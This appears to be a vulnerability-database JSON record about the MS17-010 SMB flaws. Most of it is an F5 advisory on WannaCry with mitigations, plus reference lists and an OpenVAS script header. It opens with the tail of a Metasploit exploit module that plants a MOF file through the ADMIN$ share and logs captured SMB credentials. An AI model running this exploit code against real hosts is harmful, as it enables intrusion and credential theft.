mof\r\n fd.close\r\n print_status(\"Created %SystemRoot%\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\")\r\n\r\n # Disconnect from the ADMIN$\r\n simple.disconnect(share)\r\n end\r\n\r\n def report_auth\r\n service_data = {\r\n address: ::Rex::Socket.getaddress(datastore['RHOST'],true),\r\n port: datastore['RPORT'],\r\n service_name: 'smb',\r\n protocol: 'tcp',\r\n workspace_id: myworkspace_id\r\n }\r\n\r\n credential_data = {\r\n origin_type: :service,\r\n module_fullname: self.fullname,\r\n private_data: datastore['SMBPass'],\r\n username: datastore['SMBUser'].downcase\r\n }\r\n\r\n if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'\r\n credential_data.merge!({\r\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\r\n realm_value: datastore['SMBDomain']\r\n })\r\n end\r\n\r\n if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/\r\n credential_data.merge!({:private_type => :ntlm_hash})\r\n else\r\n credential_data.merge!({:private_type => :password})\r\n end\r\n\r\n credential_data.merge!(service_data)\r\n\r\n credential_core = create_credential(credential_data)\r\n\r\n login_data = {\r\n access_level: 'Admin',\r\n core: credential_core,\r\n last_attempted_at: DateTime.now,\r\n status: Metasploit::Model::Login::Status::SUCCESSFUL\r\n }\r\n\r\n login_data.merge!(service_data)\r\n create_credential_login(login_data)\r\n end\r\nend\n\n# 0day.today [2018-03-01] #", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}], "f5": [{"id": "F5:K57181937", "hash": "330bd78d90882d9853f4b96b657c390c", "type": "f5", "bulletinFamily": "software", "title": "Multiple Microsoft SMB (Wannacry/Wannacrypt/Petya/Goldeneye) vulnerabilities", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.1.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIn addition to standard mitigation options such as patching, using antivirus programs on endpoints, and using unaffected backups, you may be able to leverage F5 products to provide additional mitigation options in the following non-exhaustive ways:\n\n * **BIG-IP LTM**\n\nFor a BIG-IP LTM system placed in the network path, in such a way as to be able to process traffic that contains the exploit, virtual servers listening on SMBv1 ports can be used to leverage iRules and/or stream profiles to inspect and block scanning and infection attempts. A stream profile and iRules-based approach for detection and blocking are being developed by resources within F5. Additionally, you can use packet filters to block access to SMBv1 ports at the Virtual Local Area Network (VLAN) level.\n\n * **BIG-IP DNS (formerly known as BIG-IP GTM) **\n\nThe BIG-IP DNS system can blackhole access to command and control channels and download sites.\n\n * **BIG-IP AFM**\n\nThe BIG-IP AFM system, when appropriately placed in the network path, can block access to SMBv1 ports (139, 445, etc.).\n\n * **BIG-IP APM**\n\nThe BIG-IP APM system can use L4 ACLs to block inbound and outbound traffic on Virtual Private Network (VPN) connections, and you can apply iRules to inspect traffic using a layered virtual, as with BIG-IP LTM. APM access policies can use endpoint checks to determine if the connecting device is patched appropriately, or is running an antivirus program with an up-to-date set of virus definitions. If these conditions are not met, access can be blocked. You can use a Secure Web Gateway (SWG) policy to blackhole outbound access to command and control and download sites.\n\n**Note**: The following link takes you to a resource outside of AskF5. The third party could remove the document without our knowledge.\n\n * [Microsoft Security Bulletin MS17-010 - Critical](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n\n * F5 Labs: [FROM NSA EXPLOIT TO WIDESPREAD RANSOMWARE: WANNACRY IS ON THE LOOSE](<https://f5.com/labs/articles/threat-intelligence/malware/from-nsa-exploit-to-widespread-ransomware-wannacry-is-on-the-loose-26847>)\n\n**Note**: For information about how to locate the following four F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\n * The **Configuring Access Control Lists** chapter of the _**BIG-IP APM: Portal Access**_ guide\n * The **About endpoint security client-side items **section of the _**BIG-IP APM: Visual Policy Editor**_ guide\n * The **Packet Filters** chapter of the _**BIG-IP TMOS: Routing Administration**_ guide\n * The _**AFM policies and implementation**_ guide\n\n**Note**: A DevCentral login is required to access the following two items.\n\n * For an example of an iApp/iRule mitigation, refer to the [WannaCry Ransomware and MS17-010 Vulnerability](<https://devcentral.f5.com/articles/wannacry-ransomware-and-ms17-010-vulnerability-26906>) DevCentral article\n * For an example of DNS blackhole with LTM and DNS services, refer to the [LTM DNS Blackhole](<https://devcentral.f5.com/codeshare/ltm-dns-blackhole>) DevCentral article \n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K17329: BIG-IP GTM name has changed to BIG-IP DNS](<https://support.f5.com/csp/article/K17329>)\n", "published": "2017-05-17T01:18:00", "modified": "2017-06-28T01:23:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.f5.com/csp/article/K57181937", "reporter": "f5", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2019-04-30T18:21:13", "history": [{"bulletin": {"id": "F5:K57181937", "hash": "1786d7ba1d5cbb6388b26237b2e2ed2c7b1176e43eb65bac1d2932b8173f9787", "type": "f5", "bulletinFamily": "software", "title": "Multiple Microsoft SMB (Wannacry/Wannacrypt/Petya/Goldeneye) vulnerabilities", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.1.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIn addition to standard mitigation options such as patching, using antivirus programs on endpoints, and using unaffected backups, you may be able to leverage F5 products to provide additional mitigation options in the following non-exhaustive ways:\n\n * **BIG-IP LTM**\n\nFor a BIG-IP LTM system placed in the network path, in such a way as to be able to process traffic that contains the exploit, virtual servers listening on SMBv1 ports can be used to leverage iRules and/or stream profiles to inspect and block scanning and infection attempts. A stream profile and iRules-based approach for detection and blocking are being developed by resources within F5. Additionally, you can use packet filters to block access to SMBv1 ports at the Virtual Local Area Network (VLAN) level.\n\n * **BIG-IP DNS (formerly known as BIG-IP GTM) **\n\nThe BIG-IP DNS system can blackhole access to command and control channels and download sites.\n\n * **BIG-IP AFM**\n\nThe BIG-IP AFM system, when appropriately placed in the network path, can block access to SMBv1 ports (139, 445, etc.).\n\n * **BIG-IP APM**\n\nThe BIG-IP APM system can use L4 ACLs to block inbound and outbound traffic on Virtual Private Network (VPN) connections, and you can apply iRules to inspect traffic using a layered virtual, as with BIG-IP LTM. APM access policies can use endpoint checks to determine if the connecting device is patched appropriately, or is running an antivirus program with an up-to-date set of virus definitions. If these conditions are not met, access can be blocked. You can use a Secure Web Gateway (SWG) policy to blackhole outbound access to command and control and download sites.\n\n**Note**: The following link takes you to a resource outside of AskF5. The third party could remove the document without our knowledge.\n\n * [Microsoft Security Bulletin MS17-010 - Critical](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n\n * F5 Labs: [FROM NSA EXPLOIT TO WIDESPREAD RANSOMWARE: WANNACRY IS ON THE LOOSE](<https://f5.com/labs/articles/threat-intelligence/malware/from-nsa-exploit-to-widespread-ransomware-wannacry-is-on-the-loose-26847>)\n\n**Note**: For information about how to locate the following four F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\n * The **Configuring Access Control Lists** chapter of the _**BIG-IP APM: Portal Access**_ guide\n * The **About endpoint security client-side items **section of the _**BIG-IP APM: Visual Policy Editor**_ guide\n * The **Packet Filters** chapter of the _**BIG-IP TMOS: Routing Administration**_ guide\n * The _**AFM policies and implementation**_ guide\n\n**Note**: A DevCentral login is required to access the following two items.\n\n * For an example of an iApp/iRule mitigation, refer to the [WannaCry Ransomware and MS17-010 Vulnerability](<https://devcentral.f5.com/articles/wannacry-ransomware-and-ms17-010-vulnerability-26906>) DevCentral article\n * For an example of DNS blackhole with LTM and DNS services, refer to the [LTM DNS Blackhole](<https://devcentral.f5.com/codeshare/ltm-dns-blackhole>) DevCentral article \n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K17329: BIG-IP GTM name has changed to BIG-IP DNS](<https://support.f5.com/csp/article/K17329>)\n", "published": "2017-05-17T01:18:00", "modified": "2017-06-28T01:23:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://support.f5.com/csp/article/K57181937", "reporter": "f5", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2019-04-30T18:21:13", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"modified": "2019-04-30T18:21:13", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-04-30T18:21:13", "rev": 2, "value": 6.4, "vector": "NONE"}}, "objectVersion": "1.6", "affectedSoftware": []}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2019-04-30T18:21:13"}], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0146"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96709", "SMNTC-96704", "SMNTC-96707"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177", "CPAI-2017-0198", "CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0200"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2019-04-30T18:21:13", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2019-04-30T18:21:13", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [], "_object_type": "robots.models.f5.F5Bulletin", "_object_types": ["robots.models.f5.F5Bulletin", "robots.models.base.Bulletin"]}], "openvas": [{"id": "OPENVAS:1361412562310810676", "hash": "7e2bc500cf9abfb39d0ff12fdc47c307", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.", "published": "2017-03-22T00:00:00", "modified": "2020-06-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810676", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/rapid7/metasploit-framework/pull/8167/files", "https://support.microsoft.com/en-in/kb/4013078", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2020-06-08T23:26:33", "history": [{"bulletin": {"id": "OPENVAS:1361412562310810676", "hash": "7e45f4645aadf99f1ce78fc8491436ba89940d25578ff6a36b06aa4c3d9479d5", "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)", "description": "This host is missing a critical security\n update according to Microsoft Bulletin MS17-010.", "published": "2017-03-22T00:00:00", "modified": "2017-10-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810676", "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "references": ["https://github.com/rapid7/metasploit-framework/pull/8167/files", "https://support.microsoft.com/en-in/kb/4013078", "https://technet.microsoft.com/library/security/MS17-010"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2018-08-30T19:19:53", "history": [], "viewCount": 10, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "pluginID": "1361412562310810676", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ms17-010_remote.nasl 7543 2017-10-24 11:02:02Z cfischer $\n#\n# Microsoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more 